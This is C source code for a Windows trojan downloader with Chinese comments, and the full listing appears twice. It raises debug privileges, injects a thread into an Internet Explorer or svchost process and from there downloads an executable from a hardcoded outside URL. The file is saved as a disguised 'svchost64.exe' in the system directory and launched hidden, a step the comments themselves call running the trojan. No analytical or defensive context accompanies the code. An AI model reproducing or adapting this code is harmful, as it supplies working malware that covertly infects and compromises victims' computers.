#include "stdafx.h”
#include “stdio.h”
#include “string.h”
#include <windows.h>
#include <wininet.h>
#include “tlhelp32.h”
#pragma comment(lib,”wininet.lib“)
/***********************************************/
typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd, //定义 ShellExecute
LPCTSTR lpOperation,
LPCTSTR lpFile,
LPCTSTR lpParameters,
LPCTSTR lpDiretory,
INT nShowCmd);
typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText, //定义MessageBoxA原型
LPCTSTR lpszCaption, UINT nType);
// define functions in kernel32.dll
typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD, //定义CreateFileA
LPSECURITY_ATTRIBUTES,
DWORD, DWORD, HANDLE );
typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD, //定义WriteFile
LPDWORD, LPOVERLAPPED );
typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject ); //定义CloseHandle
typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR); //定义GetModuleHandle
typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR); //定义GetProcAddress
typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR); //定义LoadLibraryA
// define functions in wininet.dll
typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent, //定义InternetOpen
IN DWORD dwAccessType,
IN LPCTSTR lpszProxyByName,
IN LPCTSTR lpszProxyByPass,
IN DWORD dwFlags);
typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,//定义InternetOpenUrl
IN LPCTSTR lpszUrl,
IN LPCTSTR lpszHeaders OPTIONAL,
IN DWORD dwHeadersLength,
IN DWORD dwFlags,
IN DWORD dwContext);
typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile, //定义InternetReadFile
IN LPVOID lpBuffer,
IN DWORD dwNumberOfBytesToRead,
OUT LPDWORD lpdwNumberOfBytesRead);
typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); //定义InternetCloseHandle
typedef struct tag_Inject // define a structure to copy to distance process
{
fun_GetModuleHandle GetModuleHandle;
fun_GetProcAddress GetProcAddress;
fun_LoadLibrary LoadLibrary;
char szKernel[32];
char szUser[32];
char szNet[32];
char szShell[32];
char szMessageBox[32];
char szInternetOpen[32];
char szInternetOpenUrl[MAX_PATH];
char szInternetReadFile[128];
char szInternetCloseHandle[32];
char szCreateFile[32];
char szWriteFile[32];
char szCloseHandle[32];
char szShellExecute[32];
char szHeader[16];
char szInterFlag[32];
char szOpenFlag[10];
char szUrlAddr[MAX_PATH];
char szUrlAddr1[MAX_PATH];
char szFilePath[MAX_PATH];
char szFilePath1[MAX_PATH];
}Inject;
/***************************************/
/************************************************/
static BOOL ThreadProc(Inject* Inject_info)
{
HMODULE hKernel32, hUser32, hWininet, hShell32; //模块句柄
fun_InternetOpen j_InternetOpen; //定义函数指针
fun_InternetOpenUrl j_InternetOpenUrl;
fun_InternetReadFile j_InternetReadFile;
fun_InternetCloseHandle j_InternetCloseHandle;
fun_CreateFile j_CreateFile;
fun_WriteFile j_WriteFile;
fun_CloseHandle j_CloseHandle;
fun_MessageBox j_MessageBox;
fun_ShellExecute j_ShellExecute;
hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel); //隐式加载DLL
if (NULL == hKernel32) //加载失败
{
hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel); //显示加载
if (NULL == hKernel32) //显示加载失败
{
return FALSE;
}
}
hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);
if (NULL == hUser32)
{
hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
if (NULL == hUser32)
{
return FALSE;
}
}
hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);
if (NULL == hWininet)
{
hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
if (NULL == hWininet)
{
return FALSE;
}
}
hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell);
if (NULL == hShell32)
{
hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
if (NULL == hShell32)
{
return FALSE;
}
}
j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet, //绑定 InternetOpen
Inject_info->szInternetOpen);
j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet, //绑定 InternetOpenUrl
Inject_info->szInternetOpenUrl);
j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet, //绑定 InternetReadFile
Inject_info->szInternetReadFile);
j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet, //绑定 InternetCloseHandle
Inject_info->szInternetCloseHandle);
j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32, //绑定 CreateFile
Inject_info->szCreateFile);
j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32, //绑定 WriteFile
Inject_info->szWriteFile);
j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32, //绑定 CloseHandle
Inject_info->szCloseHandle);
j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32, //绑定 MessageBox
Inject_info->szMessageBox);
j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32, //绑定 ShellExecute
Inject_info->szShellExecute);
HINTERNET hNet, hFile; //定义网络句柄和文件句柄
hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
NULL, NULL, 0); //打开网络并返回网络句柄
if (NULL == hNet) //打开网络出错
{
return FALSE;
}
hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
strlen(Inject_info->szHeader),
INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0); //打开指定的URL并返回请求的URL的资源句柄
if (NULL == hFile) //打开网络地址出错
{
return FALSE;
}
char buff[1024]; //数据传输缓存
DWORD dwRead, //字节数
dwWritten = NULL; //实际写入的字节数
HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE, //始终创建文件
0, NULL, CREATE_ALWAYS, 0 ,NULL);
if (NULL == hCreateFile) //创建文件出错!
{
return FALSE;
}
while(j_InternetReadFile(hFile, buff, 1023, &dwRead))
{
if (0 == dwRead) //如果传输出错,退出
break;
j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL); //将读取到的数据写入本地文件
}
j_InternetCloseHandle(hNet); //关闭网络句柄
j_InternetCloseHandle(hFile); //关闭网络文件句柄
j_CloseHandle(hCreateFile); //关闭本地文件句柄
j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE); //运行木马
return TRUE;
}
static void AddressFlag(void)
{
}
/****************************************************************************************************************/
/***************************************************************************************/
/* 提升当前进程的权限到 DEBUG */
/***************************************************************************************/
/****************************************************************************************************************/
BOOL ImprovePrivilege() //将进程提权
{
HANDLE hToken = NULL ; //令牌句柄
BOOL bRet = FALSE; //返回执行结果
TOKEN_PRIVILEGES tp = {1, {0, 0, SE_PRIVILEGE_ENABLED}}; //填充权限令牌结构
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); //查询是否具有调试权限
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken); //打开进程权限令牌
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, 0, 0); //为进程申请 DEBUG 权限
bRet = (GetLastError() == ERROR_SUCCESS); //检测是否执行成功
return bRet;
}
/****************************************************************************************************************/
/***************************************************************************************/
/* 得到IExplore.exe的进程ID */
/***************************************************************************************/
/****************************************************************************************************************/
DWORD Get_ProcID()
{
char* strProc = new char[256];
HANDLE hSnap; //快照句柄
PROCESSENTRY32 ppe; //进程结构信息
hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //创建系统进程快照
if (!ImprovePrivilege()) //提升本进程权限
{
return FALSE;
}
ppe.dwSize = sizeof( PROCESSENTRY32 ); //计算结构大小
Process32First( hSnap, &ppe ); //找到第一个进程
while ( 1 ) //判断系统中的进程是否有IE的进程
{
strcpy(strProc, ppe.szExeFile); //转存
strProc = strlwr(strProc); //转换为小写
if (0 == strcmp(strProc, “iexplore.exe“))//判断是否是 IE
{
return ppe.th32ProcessID;
}
else if (0 == strcmp(strProc, “svchost.exe“))//判断是否是 svchost
{
return ppe.th32ProcessID;
}
if ( !Process32Next( hSnap, &ppe ))
{
break;
}
}
CloseHandle( hSnap );
return 0;
}
/*************************************/
/*************************************************************************************/
/* 将 ThreadProc 函数以插入线程的形式在浏览器进程中运行 */
/*************************************/
/*************************************/
BOOL InsertThread()
{
char szSystemRoot[MAX_PATH];
PDWORD pdwRemote = NULL; //申请远程空间地址
const int iCodeSize = ((LPBYTE)AddressFlag - (LPBYTE)ThreadProc);//计算代码长度
Inject *InjectRemote = NULL; //将Inject复制到远程进程空间中去
DWORD dwThread = NULL,
dwOut = NULL,
dwProc = Get_ProcID();
HANDLE hProc = NULL;
const DWORD cbMemSize = iCodeSize + sizeof(Inject) + 3; //需要的内存块大小
Inject Inject_stru = {NULL, NULL, NULL,
“kernel32.dll“,
“user32.dll“,
“wininet.dll“,
“shell32.dll“,
“MessageBoxA“,
“InternetOpenA“,
“InternetOpenUrlA“,
“InternetReadFile“,
“InternetCloseHandle“,
“CreateFileA“,
“WriteFile“,
“CloseHandle“,
“ShellExecuteA“,
“Accept: */*\r\n\r\n“,
“RookIE/1.0“,
“wba“,
“http://www.hf-hx.com/music/x.exe“,
“”}; //初始化结构
GetSystemDirectory(szSystemRoot, sizeof(szSystemRoot)); //得到系统目录
strcat(szSystemRoot, “\\svchost64.exe“); //构造文件名(含路径)
strcpy(Inject_stru.szFilePath, szSystemRoot); //传递给Inject 结构中的szFilePaht
HMODULE hKernel32 = GetModuleHandle(”kernel32.dll“);
Inject_stru.GetModuleHandle = (fun_GetModuleHandle)GetProcAddress(hKernel32, “GetModuleHandleA“);//绑定GetModuleHandle
Inject_stru.GetProcAddress = (fun_GetProcAddress)GetProcAddress(hKernel32, “GetProcAddress“); //绑定GetProcAddress
Inject_stru.LoadLibrary = (fun_LoadLibrary)GetProcAddress(hKernel32, “LoadLibraryA“);//绑定LoadLibrary
hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProc); //以最高权限打开浏览器进程
if (NULL == hProc)
{
return FALSE;
}
pdwRemote = (PDWORD)VirtualAllocEx(hProc, NULL, cbMemSize, MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); //在远程空间中申请内存块
if (NULL == pdwRemote)
{
return FALSE;
}
if (!WriteProcessMemory(hProc, pdwRemote, (LPVOID)ThreadProc, cbMemSize, &dwOut)) //向远程进程写入功能代码
{
return FALSE;
}
InjectRemote = (Inject*)(((LPBYTE)pdwRemote) + ((iCodeSize + 4) & ~3));
if (!WriteProcessMemory(hProc, InjectRemote, &Inject_stru, sizeof(Inject_stru), &dwOut)) //向远程线程写入结构数据
{
return FALSE;
}
if (NULL == CreateRemoteThread(hProc, NULL, 65535, (LPTHREAD_START_ROUTINE)pdwRemote, InjectRemote, 0, NULL)) //创建进程线程
{
return FALSE;
}
return TRUE;
}
/******************************************/
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InsertThread();
return 0;
}
#include “stdio.h”
#include “string.h”
#include <windows.h>
#include <wininet.h>
#include “tlhelp32.h”
#pragma comment(lib,”wininet.lib“)
/***********************************************/
typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd, //定义 ShellExecute
LPCTSTR lpOperation,
LPCTSTR lpFile,
LPCTSTR lpParameters,
LPCTSTR lpDiretory,
INT nShowCmd);
typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText, //定义MessageBoxA原型
LPCTSTR lpszCaption, UINT nType);
// define functions in kernel32.dll
typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD, //定义CreateFileA
LPSECURITY_ATTRIBUTES,
DWORD, DWORD, HANDLE );
typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD, //定义WriteFile
LPDWORD, LPOVERLAPPED );
typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject ); //定义CloseHandle
typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR); //定义GetModuleHandle
typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR); //定义GetProcAddress
typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR); //定义LoadLibraryA
// define functions in wininet.dll
typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent, //定义InternetOpen
IN DWORD dwAccessType,
IN LPCTSTR lpszProxyByName,
IN LPCTSTR lpszProxyByPass,
IN DWORD dwFlags);
typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,//定义InternetOpenUrl
IN LPCTSTR lpszUrl,
IN LPCTSTR lpszHeaders OPTIONAL,
IN DWORD dwHeadersLength,
IN DWORD dwFlags,
IN DWORD dwContext);
typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile, //定义InternetReadFile
IN LPVOID lpBuffer,
IN DWORD dwNumberOfBytesToRead,
OUT LPDWORD lpdwNumberOfBytesRead);
typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); //定义InternetCloseHandle
typedef struct tag_Inject // define a structure to copy to distance process
{
fun_GetModuleHandle GetModuleHandle;
fun_GetProcAddress GetProcAddress;
fun_LoadLibrary LoadLibrary;
char szKernel[32];
char szUser[32];
char szNet[32];
char szShell[32];
char szMessageBox[32];
char szInternetOpen[32];
char szInternetOpenUrl[MAX_PATH];
char szInternetReadFile[128];
char szInternetCloseHandle[32];
char szCreateFile[32];
char szWriteFile[32];
char szCloseHandle[32];
char szShellExecute[32];
char szHeader[16];
char szInterFlag[32];
char szOpenFlag[10];
char szUrlAddr[MAX_PATH];
char szUrlAddr1[MAX_PATH];
char szFilePath[MAX_PATH];
char szFilePath1[MAX_PATH];
}Inject;
/***************************************/
/************************************************/
static BOOL ThreadProc(Inject* Inject_info)
{
HMODULE hKernel32, hUser32, hWininet, hShell32; //模块句柄
fun_InternetOpen j_InternetOpen; //定义函数指针
fun_InternetOpenUrl j_InternetOpenUrl;
fun_InternetReadFile j_InternetReadFile;
fun_InternetCloseHandle j_InternetCloseHandle;
fun_CreateFile j_CreateFile;
fun_WriteFile j_WriteFile;
fun_CloseHandle j_CloseHandle;
fun_MessageBox j_MessageBox;
fun_ShellExecute j_ShellExecute;
hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel); //隐式加载DLL
if (NULL == hKernel32) //加载失败
{
hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel); //显示加载
if (NULL == hKernel32) //显示加载失败
{
return FALSE;
}
}
hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);
if (NULL == hUser32)
{
hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
if (NULL == hUser32)
{
return FALSE;
}
}
hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);
if (NULL == hWininet)
{
hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
if (NULL == hWininet)
{
return FALSE;
}
}
hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell);
if (NULL == hShell32)
{
hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
if (NULL == hShell32)
{
return FALSE;
}
}
j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet, //绑定 InternetOpen
Inject_info->szInternetOpen);
j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet, //绑定 InternetOpenUrl
Inject_info->szInternetOpenUrl);
j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet, //绑定 InternetReadFile
Inject_info->szInternetReadFile);
j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet, //绑定 InternetCloseHandle
Inject_info->szInternetCloseHandle);
j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32, //绑定 CreateFile
Inject_info->szCreateFile);
j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32, //绑定 WriteFile
Inject_info->szWriteFile);
j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32, //绑定 CloseHandle
Inject_info->szCloseHandle);
j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32, //绑定 MessageBox
Inject_info->szMessageBox);
j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32, //绑定 ShellExecute
Inject_info->szShellExecute);
HINTERNET hNet, hFile; //定义网络句柄和文件句柄
hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
NULL, NULL, 0); //打开网络并返回网络句柄
if (NULL == hNet) //打开网络出错
{
return FALSE;
}
hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
strlen(Inject_info->szHeader),
INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0); //打开指定的URL并返回请求的URL的资源句柄
if (NULL == hFile) //打开网络地址出错
{
return FALSE;
}
char buff[1024]; //数据传输缓存
DWORD dwRead, //字节数
dwWritten = NULL; //实际写入的字节数
HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE, //始终创建文件
0, NULL, CREATE_ALWAYS, 0 ,NULL);
if (NULL == hCreateFile) //创建文件出错!
{
return FALSE;
}
while(j_InternetReadFile(hFile, buff, 1023, &dwRead))
{
if (0 == dwRead) //如果传输出错,退出
break;
j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL); //将读取到的数据写入本地文件
}
j_InternetCloseHandle(hNet); //关闭网络句柄
j_InternetCloseHandle(hFile); //关闭网络文件句柄
j_CloseHandle(hCreateFile); //关闭本地文件句柄
j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE); //运行木马
return TRUE;
}
static void AddressFlag(void)
{
}
/****************************************************************************************************************/
/***************************************************************************************/
/* 提升当前进程的权限到 DEBUG */
/***************************************************************************************/
/****************************************************************************************************************/
BOOL ImprovePrivilege() //将进程提权
{
HANDLE hToken = NULL ; //令牌句柄
BOOL bRet = FALSE; //返回执行结果
TOKEN_PRIVILEGES tp = {1, {0, 0, SE_PRIVILEGE_ENABLED}}; //填充权限令牌结构
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); //查询是否具有调试权限
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken); //打开进程权限令牌
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, 0, 0); //为进程申请 DEBUG 权限
bRet = (GetLastError() == ERROR_SUCCESS); //检测是否执行成功
return bRet;
}
/****************************************************************************************************************/
/***************************************************************************************/
/* 得到IExplore.exe的进程ID */
/***************************************************************************************/
/****************************************************************************************************************/
DWORD Get_ProcID()
{
char* strProc = new char[256];
HANDLE hSnap; //快照句柄
PROCESSENTRY32 ppe; //进程结构信息
hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //创建系统进程快照
if (!ImprovePrivilege()) //提升本进程权限
{
return FALSE;
}
ppe.dwSize = sizeof( PROCESSENTRY32 ); //计算结构大小
Process32First( hSnap, &ppe ); //找到第一个进程
while ( 1 ) //判断系统中的进程是否有IE的进程
{
strcpy(strProc, ppe.szExeFile); //转存
strProc = strlwr(strProc); //转换为小写
if (0 == strcmp(strProc, “iexplore.exe“))//判断是否是 IE
{
return ppe.th32ProcessID;
}
else if (0 == strcmp(strProc, “svchost.exe“))//判断是否是 svchost
{
return ppe.th32ProcessID;
}
if ( !Process32Next( hSnap, &ppe ))
{
break;
}
}
CloseHandle( hSnap );
return 0;
}
/*************************************/
/*************************************************************************************/
/* 将 ThreadProc 函数以插入线程的形式在浏览器进程中运行 */
/*************************************/
/*************************************/
BOOL InsertThread()
{
char szSystemRoot[MAX_PATH];
PDWORD pdwRemote = NULL; //申请远程空间地址
const int iCodeSize = ((LPBYTE)AddressFlag - (LPBYTE)ThreadProc);//计算代码长度
Inject *InjectRemote = NULL; //将Inject复制到远程进程空间中去
DWORD dwThread = NULL,
dwOut = NULL,
dwProc = Get_ProcID();
HANDLE hProc = NULL;
const DWORD cbMemSize = iCodeSize + sizeof(Inject) + 3; //需要的内存块大小
Inject Inject_stru = {NULL, NULL, NULL,
“kernel32.dll“,
“user32.dll“,
“wininet.dll“,
“shell32.dll“,
“MessageBoxA“,
“InternetOpenA“,
“InternetOpenUrlA“,
“InternetReadFile“,
“InternetCloseHandle“,
“CreateFileA“,
“WriteFile“,
“CloseHandle“,
“ShellExecuteA“,
“Accept: */*\r\n\r\n“,
“RookIE/1.0“,
“wba“,
“http://www.hf-hx.com/music/x.exe“,
“”}; //初始化结构
GetSystemDirectory(szSystemRoot, sizeof(szSystemRoot)); //得到系统目录
strcat(szSystemRoot, “\\svchost64.exe“); //构造文件名(含路径)
strcpy(Inject_stru.szFilePath, szSystemRoot); //传递给Inject 结构中的szFilePaht
HMODULE hKernel32 = GetModuleHandle(”kernel32.dll“);
Inject_stru.GetModuleHandle = (fun_GetModuleHandle)GetProcAddress(hKernel32, “GetModuleHandleA“);//绑定GetModuleHandle
Inject_stru.GetProcAddress = (fun_GetProcAddress)GetProcAddress(hKernel32, “GetProcAddress“); //绑定GetProcAddress
Inject_stru.LoadLibrary = (fun_LoadLibrary)GetProcAddress(hKernel32, “LoadLibraryA“);//绑定LoadLibrary
hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProc); //以最高权限打开浏览器进程
if (NULL == hProc)
{
return FALSE;
}
pdwRemote = (PDWORD)VirtualAllocEx(hProc, NULL, cbMemSize, MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); //在远程空间中申请内存块
if (NULL == pdwRemote)
{
return FALSE;
}
if (!WriteProcessMemory(hProc, pdwRemote, (LPVOID)ThreadProc, cbMemSize, &dwOut)) //向远程进程写入功能代码
{
return FALSE;
}
InjectRemote = (Inject*)(((LPBYTE)pdwRemote) + ((iCodeSize + 4) & ~3));
if (!WriteProcessMemory(hProc, InjectRemote, &Inject_stru, sizeof(Inject_stru), &dwOut)) //向远程线程写入结构数据
{
return FALSE;
}
if (NULL == CreateRemoteThread(hProc, NULL, 65535, (LPTHREAD_START_ROUTINE)pdwRemote, InjectRemote, 0, NULL)) //创建进程线程
{
return FALSE;
}
return TRUE;
}
/******************************************/
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InsertThread();
return 0;
}